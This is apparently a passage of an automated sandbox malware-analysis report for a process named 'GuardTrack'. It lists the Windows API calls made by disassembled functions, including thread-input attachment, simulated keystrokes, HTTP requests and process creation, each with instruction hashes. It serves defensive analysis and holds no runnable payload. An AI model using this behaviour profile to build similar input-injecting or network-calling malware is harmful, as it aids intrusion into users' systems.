                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: 2820ba012b8e821f11f287dd57b55ea135703c587a7858e213f2f7760a2a446b
                                                          • Instruction ID: 090d8175186d9b379761cf5d0e5a5ec8566ff45699005533cb7fa64a749138d8
                                                          • Opcode Fuzzy Hash: 2820ba012b8e821f11f287dd57b55ea135703c587a7858e213f2f7760a2a446b
                                                          • Instruction Fuzzy Hash: AEB1AF75E0421A9FDB11DF94D885BFEB7B6FF49321F284029E601E7251DB34A982CB90
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 006119EF
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611A03
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00611A0A
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00610A67,?,00000001), ref: 00611A19
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00611A2B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00610A67,?,00000001), ref: 00611A44
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00610A67,?,00000001), ref: 00611A56
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611A9B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611AB0
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611ABB
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 779e52f1390d79867b6136d5e34a654cf39ccc81d443969a2d69c0371df92008
                                                          • Instruction ID: 77cd373746caaf7085f60ad88283f75385b28e2e1639dea12385026f9c605c4c
                                                          • Opcode Fuzzy Hash: 779e52f1390d79867b6136d5e34a654cf39ccc81d443969a2d69c0371df92008
                                                          • Instruction Fuzzy Hash: ED310E35251208AFEB149F10DC48BE93BABEF56345F19A105FA05CB290CBB89DC08B60
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 005B260D
                                                          • SetTextColor.GDI32(?,000000FF), ref: 005B2617
                                                          • SetBkMode.GDI32(?,00000001), ref: 005B262C
                                                          • GetStockObject.GDI32(00000005), ref: 005B2634
                                                          • GetClientRect.USER32(?), ref: 005EC0FC
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 005EC113
                                                          • GetWindowDC.USER32(?), ref: 005EC11F
                                                          • GetPixel.GDI32(00000000,?,?), ref: 005EC12E
                                                          • ReleaseDC.USER32(?,00000000), ref: 005EC140
                                                          • GetSysColor.USER32(00000005), ref: 005EC15E
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                          • String ID:
                                                          • API String ID: 3430376129-0
                                                          • Opcode ID: ce2dba98936a39250c4a566c7e5d25cdf56f8f13270ccb30f5c28ed6639e8e99
                                                          • Instruction ID: 3661139944831017a3f9a8cd88ba9a3e69a4c2ae437f5c1a32ad8a4d4a8c9167
                                                          • Opcode Fuzzy Hash: ce2dba98936a39250c4a566c7e5d25cdf56f8f13270ccb30f5c28ed6639e8e99
                                                          • Instruction Fuzzy Hash: D6117C35504254BFEB615FA4EC08BE97FB2FB0A321F104265FB6A950E1CB311951EF20
                                                          APIs
                                                          • EnumChildWindows.USER32(?,0060B13A), ref: 0060B078
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: d774abe600efd0ee6b7359d2456405730145a9f7de22a21f2f0db5552b25d181
                                                          • Instruction ID: c3f9302c053f7ee85cd19feb21fdc596af3625ef58f09cc5e56f1003fc803784
                                                          • Opcode Fuzzy Hash: d774abe600efd0ee6b7359d2456405730145a9f7de22a21f2f0db5552b25d181
                                                          • Instruction Fuzzy Hash: 9A91A3705406069ACB1CEFA0C485BEFFF76BF54340F10811AE85AA72D1DF306959DB91
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 005B327E
                                                            • Part of subcall function 005B218F: GetClientRect.USER32(?,?), ref: 005B21B8
                                                            • Part of subcall function 005B218F: GetWindowRect.USER32(?,?), ref: 005B21F9
                                                            • Part of subcall function 005B218F: ScreenToClient.USER32(?,?), ref: 005B2221
                                                          • GetDC.USER32 ref: 005ED073
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005ED086
                                                          • SelectObject.GDI32(00000000,00000000), ref: 005ED094
                                                          • SelectObject.GDI32(00000000,00000000), ref: 005ED0A9
                                                          • ReleaseDC.USER32(?,00000000), ref: 005ED0B1
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005ED13C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 255c84804f36ac5bcf723439b62b3b8aa3e38276a3cdb3f4da04158815e8e859
                                                          • Instruction ID: 23c6f85278658585de39db6a2b3ef40585c53c5918bf39f07d73791812432afe
                                                          • Opcode Fuzzy Hash: 255c84804f36ac5bcf723439b62b3b8aa3e38276a3cdb3f4da04158815e8e859
                                                          • Instruction Fuzzy Hash: 1B71F134400245EFCF29CF64C888AFABFB6FF49320F184669ED955A1A6D7319981DF60
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                            • Part of subcall function 005B2714: GetCursorPos.USER32(?), ref: 005B2727
                                                            • Part of subcall function 005B2714: ScreenToClient.USER32(006777B0,?), ref: 005B2744
                                                            • Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000001), ref: 005B2769
                                                            • Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000002), ref: 005B2777
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0063C69C
                                                          • ImageList_EndDrag.COMCTL32 ref: 0063C6A2
                                                          • ReleaseCapture.USER32 ref: 0063C6A8
                                                          • SetWindowTextW.USER32(?,00000000), ref: 0063C752
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0063C765
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0063C847
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 1924731296-2107944366
                                                          • Opcode ID: 499ffe6ac26834fb990911035097e6750981b4a99171cf3ceb32662582e71f11
                                                          • Instruction ID: 0fa695cc4fc424529c5e0fd94bfba051a1b097ddc467aaf803af5c9f1f944e6a
                                                          • Opcode Fuzzy Hash: 499ffe6ac26834fb990911035097e6750981b4a99171cf3ceb32662582e71f11
                                                          • Instruction Fuzzy Hash: 65518C70104305AFD714EF14CC5AFAA7BE6FB84310F10852DF599972A2DB70A955CB92
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0062211C
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00622148
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0062218A
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0062219F
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006221AC
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006221DC
                                                          • InternetCloseHandle.WININET(00000000), ref: 00622223
                                                            • Part of subcall function 00622B4F: GetLastError.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B64
                                                            • Part of subcall function 00622B4F: SetEvent.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: ca1695a53a54f826eeaec4b8bcfc617f1ffca4fbe62b041b4471e16f5135914f
                                                          • Instruction ID: 69226b85375bb8a51ec6a786232ecf25c201d77e8bacbfeee2454944e657315c
                                                          • Opcode Fuzzy Hash: ca1695a53a54f826eeaec4b8bcfc617f1ffca4fbe62b041b4471e16f5135914f
                                                          • Instruction Fuzzy Hash: E1419DB150162ABEFB129F50DC99FFB7BAEEB08354F00411AFA049A241D7719E448FA1
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00640980), ref: 00629412
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00640980), ref: 00629446
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006295C0
                                                          • SysFreeString.OLEAUT32(?), ref: 006295EA
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: dee2af872c3ad9a190599fa5abd815797ebeffcd5edc1ef85c8b5950a9b204a8
                                                          • Instruction ID: ec80f329b591ba6d7ea2ed5625cf25c7e280e4d3f2f316965a30ebdabde4d568
                                                          • Opcode Fuzzy Hash: dee2af872c3ad9a190599fa5abd815797ebeffcd5edc1ef85c8b5950a9b204a8
                                                          • Instruction Fuzzy Hash: C7F10975A00619EFDB14DF94D884EEEB7BABF85314F108058F906AB251DB31AE46CF60
                                                          APIs
                                                          • _memset.LIBCMT ref: 0062FD9E
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0062FF31
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0062FF55
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0062FF95
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0062FFB7
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00630133
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00630165
                                                          • CloseHandle.KERNEL32(?), ref: 00630194
                                                          • CloseHandle.KERNEL32(?), ref: 0063020B
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: d534426a1244218df03d0965c54f59847bbb9fadb7b4bbcb7e60f6e0a5648b47
                                                          • Instruction ID: e3f69b3fefa480a459daae6c74e28eafaf69b69839870f6b02d61fcb90400fce
                                                          • Opcode Fuzzy Hash: d534426a1244218df03d0965c54f59847bbb9fadb7b4bbcb7e60f6e0a5648b47
                                                          • Instruction Fuzzy Hash: A5E1B0312046429FD725EF24C495BAABBE2BF85310F14886DF9858B3A2CB31EC45CF52
                                                          APIs
                                                            • Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00613B8A,?), ref: 00614BE0
                                                            • Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00613B8A,?), ref: 00614BF9
                                                            • Part of subcall function 00614FEC: GetFileAttributesW.KERNEL32(?,00613BFE), ref: 00614FED
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 006152FB
                                                          • _wcscmp.LIBCMT ref: 00615315
                                                          • MoveFileW.KERNEL32(?,?), ref: 00615330
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: 79a0b738a22f36aaacca93af6b6a18f1ed4395279389bcc499422353e3562075
                                                          • Instruction ID: 4302963cf0050e4809aed6099055b3ce515856677f38683b0f583dace745a081
                                                          • Opcode Fuzzy Hash: 79a0b738a22f36aaacca93af6b6a18f1ed4395279389bcc499422353e3562075
                                                          • Instruction Fuzzy Hash: 735182B20087859BC764DBA4C885DDBB7EDAFC5300F54092FF18AD3152EF70A6898766
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00638D24
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: ccbb282495a39ab847e4ca2112d92ca3adb8e24160cc5b3d428330b07a32c259
                                                          • Instruction ID: 526b6086c4adce039fcffb6c3f4ce9b5138346b93045495a2ad2e8bc36eb8811
                                                          • Opcode Fuzzy Hash: ccbb282495a39ab847e4ca2112d92ca3adb8e24160cc5b3d428330b07a32c259
                                                          • Instruction Fuzzy Hash: BF519B30640314BEEF249F28CC89BD97BA6AF06350F245515FA15EB2E1CF71AD90CAE4
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 005EC638
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005EC65A
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005EC672
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 005EC690
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005EC6B1
                                                          • DestroyIcon.USER32(00000000), ref: 005EC6C0
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 005EC6DD
                                                          • DestroyIcon.USER32(?), ref: 005EC6EC
                                                            • Part of subcall function 0063AAD4: DeleteObject.GDI32(00000000), ref: 0063AB0D
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 10eab005c86e13e6a908c0fe22a685c30e7c7d775c22f42dc452472e85a5c7e6
                                                          • Instruction ID: 28a67405d9632636608870b1c8b658fc545b51dbb89485615ff9426375bddc1d
                                                          • Opcode Fuzzy Hash: 10eab005c86e13e6a908c0fe22a685c30e7c7d775c22f42dc452472e85a5c7e6
                                                          • Instruction Fuzzy Hash: F0515974600209AFDB24DF25CC46BAA7FB6FB49750F104528F94697290DB70ED91DB60
                                                          APIs
                                                            • Part of subcall function 0060B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0060B54D
                                                            • Part of subcall function 0060B52D: GetCurrentThreadId.KERNEL32 ref: 0060B554
                                                            • Part of subcall function 0060B52D: AttachThreadInput.USER32(00000000,?,0060A23B,?,00000001), ref: 0060B55B
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0060A246
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0060A263
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0060A266
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0060A26F
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0060A28D
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0060A290
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0060A299
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0060A2B0
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0060A2B3
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 613568cf635fc77f1f3b481cd64885056a3daeb665c982e8420e7c292ab3bbde
                                                          • Instruction ID: d84ec247afb8c83afb7b6b74782144b81b73be6c94cbfdbb2fff1e63aecd1ad8
                                                          • Opcode Fuzzy Hash: 613568cf635fc77f1f3b481cd64885056a3daeb665c982e8420e7c292ab3bbde
                                                          • Instruction Fuzzy Hash: 2011E575550228BEF7106FA0DC49F6A3B2EDB4D790F111419F3406B0D0CAF35C509AA4
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0060915A,00000B00,?,?), ref: 006094E2
                                                          • HeapAlloc.KERNEL32(00000000,?,0060915A,00000B00,?,?), ref: 006094E9
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0060915A,00000B00,?,?), ref: 006094FE
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0060915A,00000B00,?,?), ref: 00609506
                                                          • DuplicateHandle.KERNEL32(00000000,?,0060915A,00000B00,?,?), ref: 00609509
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0060915A,00000B00,?,?), ref: 00609519
                                                          • GetCurrentProcess.KERNEL32(0060915A,00000000,?,0060915A,00000B00,?,?), ref: 00609521
                                                          • DuplicateHandle.KERNEL32(00000000,?,0060915A,00000B00,?,?), ref: 00609524
                                                          • CreateThread.KERNEL32(00000000,00000000,0060954A,00000000,00000000,00000000), ref: 0060953E
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 859a21309e0c287a6681b69b23de103103cf0d4fea62424cc9c36bdb135be704
                                                          • Instruction ID: dc703a73feb77491640ada3f29ee39b0ae814e4e3015eb3944bda31349f16ec3
                                                          • Opcode Fuzzy Hash: 859a21309e0c287a6681b69b23de103103cf0d4fea62424cc9c36bdb135be704
                                                          • Instruction Fuzzy Hash: 4F01B6B9240308BFF710ABA5DC4DF6B7BADEB8A711F019411FB05DB2A1CA709800CB20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
